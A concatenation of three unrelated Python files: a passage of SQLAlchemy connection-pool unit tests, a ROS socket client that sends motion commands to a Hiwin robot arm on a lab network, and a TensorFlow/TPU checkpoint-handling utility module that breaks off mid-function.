c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
def test_connect(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
c1 = p.connect()
conn = c1.connection
c1.close()
c2 = p.connect()
is_(conn, c2.connection)
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
HiwinRA605_socket_ros_test_20190626114016.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
def Socket_command():
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag,arm_mode_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if arm_mode_flag == True:
arm_mode_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
tflex.py
|
import tensorflow as tf
import numpy as np
from glob import glob
import os
import re
from tensorflow.python import pywrap_tensorflow
import tqdm
import h5py
import shutil
import tempfile
import traceback
import math
from tensorflow.contrib import tpu
from tensorflow.contrib.cluster_resolver import TPUClusterResolver
from tensorflow.python.framework import dtypes
import threading
def parallelize(xs, thunk, *args):
threads = []
for x in xs:
thread = threading.Thread(target=thunk, args=(x, *args))
thread.start()
threads.append(thread)
return threads
# http://stackoverflow.com/questions/1624883/alternative-way-to-split-a-list-into-groups-of-n
import itertools
def group(n, iterable, fillvalue=None):
"group(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def tuples(*args, **kws):
return [x for x in group(*args, **kws)]
class Namespace(object):
pass
state = Namespace()
def get_tpu_addr(tpu_name=None):
# Get the TPU's location
if tpu_name is not None:
return TPUClusterResolver(tpu_name).get_master()
if 'COLAB_TPU_ADDR' in os.environ:
return TPUClusterResolver().get_master()
elif 'TPU_NAME' in os.environ:
return TPUClusterResolver(os.environ['TPU_NAME']).get_master()
def get_session_target(target='auto'):
if target == 'auto':
target = get_tpu_addr()
elif target is not None:
target = get_tpu_addr(target)
if target is not None:
print("Using TPU %s" % target)
return target
class Session(tf.Session):
def __init__(self, target='auto', graph=None, config=None):
target = get_session_target(target)
super().__init__(target, graph=graph, config=config)
self.target = target
self.config = config
class MonitoredSession(tf.train.MonitoredSession):
def __init__(self, target='auto', graph=None, config=None):
target = get_session_target(target)
super().__init__(target, graph=graph, config=config)
self.target = target
self.config = config
state.split_param_count = 1e4
def split_by_params(vs, n=None, f=None):
if n is None:
n = state.split_param_count
if f is None:
f = lambda x: np.prod(x.shape.as_list())
i = 0
xs = []
for variable in vs:
xs.append(variable)
count = f(variable)
i += count
if i >= n:
yield xs
xs = []
i = 0
yield xs
def latest_checkpoint(checkpoint_dir, latest_filename=None):
paths = [x for x in glob(os.path.join(checkpoint_dir, 'model-*.*')) if not x.endswith(".tmp")]
ctrs = np.array([[int(y) for y in re.findall(r'model-([0-9]+)(?:-[0-9]+)?[.](?:npy|hdf5)', x)] for x in paths]).flatten()
if len(ctrs) <= 0:
ckpt = tf.train.latest_checkpoint(checkpoint_dir, latest_filename=latest_filename)
return ckpt
ctr = ctrs.max()
return os.path.join(checkpoint_dir, 'model-{}').format(ctr)
def truncate_value(variable, value, reshape=True):
if not reshape:
return value
shape = variable.shape.as_list()
params = np.prod(shape)
params2 = np.prod(value.shape)
if params == params2:
return value
if params2 > params:
print('Truncating {} from shape {} to shape {}'.format(variable.name, value.shape, shape))
sys.stdout.flush()
value = np.array(value)
value = value.reshape([-1])
value = value[0:params]
value = value.reshape(shape)
else:
print('Expanding {} from shape {} to shape {}'.format(variable.name, value.shape, shape))
sys.stdout.flush()
value = np.array(value)
value = value.reshape([-1])
n = math.ceil(params / params2)
value = np.tile(value, n)
value = value.reshape(shape)
return value
from tensorflow.core.protobuf import config_pb2
def initialize_tpu(session=None, timeout_in_ms=None):
session = session or tf.get_default_session()
with session.as_default():
op = tpu.initialize_system()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(op, options=options)
def load(variable, value, session=None, timeout_in_ms=None):
session = session or tf.get_default_session()
ops = variable.initializer
vals = dict([(variable.initializer.inputs[1], value)])
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(ops, vals, options=options)
def eval(variable, session=None, timeout_in_ms=None):
session = session or tf.get_default_session()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(variable, options=options)
def grab_values(variables, reader, reshape=False):
for variable in variables:
name = variable_name(variable).split(':')[0]
value = reader.get_tensor(name)
value = truncate_value(variable, value, reshape=reshape)
yield variable, value
def assign_values(variables, values, session=None, timeout_in_ms=60000):
session = session or tf.get_default_session()
ops = [x.initializer for x in variables]
vals = dict([(x.initializer.inputs[1], value) for x, value in zip(variables, values)]) # TODO: bfloat16 support
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
session.run(ops, vals, options=options)
def load_snapshot(ckpt, session=None, var_list=None, reshape=False):
session = session or tf.get_default_session()
reader = pywrap_tensorflow.NewCheckpointReader(ckpt)
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [value for variable, value in grab_values(variables, reader, reshape=reshape)]
assign_values(variables, values, session=session)
def get_variable(name, var_list=None):
name, num = name.split(':') if ':' in name else (name, '0')
num = int(num)
name = os.path.join(tf.get_variable_scope().name, name)
vs = var_list or tf.trainable_variables()
for x in vs:
if x.name.startswith(name + ':%d' % num):
return x
def load_weights(ckpt, session=None, var_list=None, reshape=False):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
files = list(sorted(glob(ckpt + '-*.npy')))
for out in tqdm.tqdm(files):
for name, value in np.load(out, allow_pickle=True):
variable = get_variable(name)
if variable is None:
print('Warning: variable %s not loaded' % name)
else:
value = truncate_value(variable, value, reshape=reshape)
variable.load(value, session)
def load_variables(ckpt, session=None, var_list=None, reshape=False):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
with h5py.File(ckpt, "r") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [truncate_value(x, f[variable_name(x)], reshape=reshape) for x in variables]
assign_values(variables, values, session=session)
def maketree(path):
try:
os.makedirs(path)
except:
pass
state.cache_ops = {}
def cast_variables(variables, graph=None, cache_ops=None):
if graph is None:
graph = tf.get_default_graph()
if cache_ops is None:
cache_ops = state.cache_ops
if graph not in cache_ops:
cache_ops[graph] = {}
cache = cache_ops[graph]
ops = []
for variable in variables:
if variable in cache:
op = cache[variable]
elif variable.dtype == dtypes.bfloat16_ref or variable.dtype == tf.bfloat16:
op = tf.cast(variable, tf.float32)
else:
op = variable
cache[variable] = op
ops.append(op)
return ops
import re
def variable_name(variable):
if re.match(r'core[0-9]+/', variable.name):
return variable.name.split('/', 1)[-1]
return variable.name
def save_variables(ckpt, session=None, var_list=None):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
maketree(os.path.dirname(ckpt))
fname = ckpt+'.tmp'
with h5py.File(fname, "w") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
ops = cast_variables(variables)
values = session.run(ops)
for value, variable in zip(values, variables):
name = variable_name(variable)
shape = variable.shape.as_list()
dtype = variable.dtype
dset = f.create_dataset(name, shape, dtype=np.float32)
dset[:] = value
print('Writing snapshot %s' % ckpt)
os.rename(ckpt+'.tmp', ckpt)
def fetch_variables(session=None, var_list=None):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = session.run(variables)
yield variables, values
def partition_variables(session=None, var_list=None):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
yield variables
class Saver(object):
def __init__(
self,
var_list=None,
reshape=False,
sharded=False,
max_to_keep=5,
keep_checkpoint_every_n_hours=10000.0,
name=None,
restore_sequentially=False,
saver_def=None,
builder=None,
defer_build=False,
allow_empty=False,
write_version=tf.train.SaverDef.V2,
pad_step_number=False,
save_relative_paths=False,
filename=None):
self.var_list = var_list
self.reshape = reshape
self.sharded = sharded
self.max_to_keep = max_to_keep
self.keep_checkpoint_every_n_hours = keep_checkpoint_every_n_hours
self.name = name
self.restore_sequentially = restore_sequentially
self.saver_def = saver_def
self.builder = builder
self.defer_build = defer_build
self.allow_empty = allow_empty
self.write_version = write_version
self.pad_step_number = pad_step_number
self.save_relative_paths = save_relative_paths
self.filename = filename
self.checkpoints = []
def restore(self, sess, save_path):
if save_path.endswith('.ckpt'):
load_snapshot(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif save_path.endswith('.hdf5'):
load_variables(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.npy') or os.path.exists(save_path + '-0.npy'):
load_weights(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.hdf5'):
load_variables(save_path + '.hdf5', session=sess, var_list=self.var_list, reshape=self.reshape)
else:
raise Exception("Can't load checkpoint %s" % save_path)
def save(self,
sess,
save_path,
global_step=None,
latest_filename=None,
meta_graph_suffix="meta",
write_meta_graph=True,
write_state=True,
strip_default_attrs=False,
save_debug_info=False):
if global_step is not None:
name = '%s-%d.hdf5' % (save_path, global_step)
else:
name = '%s.hdf5' % save_path
save_variables(name, session=sess, var_list=self.var_list)
self.checkpoints.append(name)
if self.max_to_keep > 0:
while len(self.checkpoints) > self.max_to_keep:
fname = self.checkpoints[0]
if fname != name:
print('Truncating %s' % fname)
try:
with open(fname, "wb") as f:
pass
except:
print('Failed to truncate %s' % fname)
self.checkpoints = self.checkpoints[1:]
def fetch(self, sess, var_list=None):
if var_list == None:
var_list = self.var_list
for variables, values in fetch_variables(session=sess, var_list=var_list):
yield variables, values
def variables(self, sess, var_list=None):
if var_list == None:
var_list = self.var_list
for variables in partition_variables(session=sess, var_list=var_list):
yield variables
def assign(self, sess, variables, values):
return assign_values(variables, values, session=sess)
class Commands(object):
def __init__(self, path='commands'):
self.path = path
self.commands = []
self.args = []
self.keys = {}
self.frozen = False
def has(self, name, **keys):
if 'action' in keys:
action = keys.pop('action')
for name1, action1 in self.commands:
if name == name1 and action1 == action:
return True
else:
for name1, action1 in self.commands:
if name == name1:
return True
return False
def add(self, name, action=None):
if not self.has(name=name, action=action):
self.commands.append((name, action))
full = self.full_path(name)
maketree(full)
def full_path(self, name):
return os.path.join(self.path, name)
def check(self, *args, **keys):
if not self.frozen:
heartbeat()
ops = []
seen = set()
for name, action in self.commands:
full = self.full_path(name)
if not os.path.isdir(full):
if name not in seen:
seen.add(name)
ops.append(name)
for op in ops:
self.run(op, *args, **keys)
return ops
def run(self, op):
ran = False
for name, action in self.commands:
if name == op:
print('Running command', name, action)
if not ran:
full = self.full_path(op)
maketree(full)
ran = True
if action:
action()
if not ran:
raise Exception('Commands.execute failed: no such command: {}'.format(op))
def run_with_args(self, op, *args, **keys):
with CommandArgs(*args, **keys):
return self.run(op)
commander = None
def commands(**keys):
global commander
if commander is None:
commander = Commands()
cmds = keys.pop('commands') if 'commands' in keys else None
if cmds is not None:
for cmd in cmds:
action = None
if isinstance(cmd, str):
name = cmd
elif len(cmd) >= 2:
name, action = cmd
elif len(cmd) >= 1:
name = cmd[0]
else:
continue
commander.add(name=name, action=action)
return commander
class CommandArgs(object):
def __init__(self, *args, **keys):
self.args = list(args)
self.keys = keys.copy()
self.cmdr = commands()
def __enter__(self):
self.args_prev = self.cmdr.args
self.keys_prev = self.cmdr.keys
self.cmdr.args = self.args
self.cmdr.keys = self.keys
def __exit__(self, *excinfo):
self.cmdr.args = self.args_prev
self.cmdr.keys = self.keys_prev
def check_commands():
try:
cmdr = commands()
return cmdr.check()
except:
traceback.print_exc()
def check_commands_with_args(*args, **keys):
try:
cmdr = commands()
with CommandArgs(*args, **keys):
return cmdr.check()
except:
traceback.print_exc()
def add_command(name, action=None, **keys):
cmdr = commands()
return cmdr.add(name=name, action=action)
def register_command(*args, **keys):
fn = args[0]
if isinstance(fn, str):
add_command(fn)
else:
name = fn.__qualname__
name = name.replace('.<locals>.', '_command_')
if name.endswith('_command_save'):
name = 'save'
name = name.replace('___', '/')
action = fn
print(name, action)
add_command(name, action)
return fn
def has_command(name):
cmdr = commands()
return cmdr.has(name)
def run_command(command_name):
cmdr = commands()
return cmdr.run(command_name)
def run_command_with_args(command_name, *args, **keys):
cmdr = commands()
return cmdr.run_with_args(command_name, *args, **keys)
def command_arg(x, unset=None):
cmdr = commands()
if isinstance(x, int):
try:
return cmdr.args[x]
except:
return unset
else:
if x in cmdr.keys:
return cmdr.keys[x]
return unset
def command_args():
cmdr = commands()
return cmdr.args, cmdr.keys
@register_command
def attach_debugger():
import pdb
pdb.set_trace()
from pprint import pprint
@register_command
def print_status():
args, props = command_args()
for k, v in enumerate(args):
pprint(v)
for k, v in props.items():
pprint({k: v})
#
# return current UTC timestamp.
#
def utc():
from datetime import datetime
d = datetime.utcnow()
import calendar
return calendar.timegm(d.utctimetuple())
state.no_heartbeat = True
def heartbeat():
if state.no_heartbeat:
return
pongfile=os.environ['PONG'] if 'PONG' in os.environ else 'pong.txt'
with open(pongfile, "a+") as f:
nonce = os.urandom(8).hex()
now=utc()
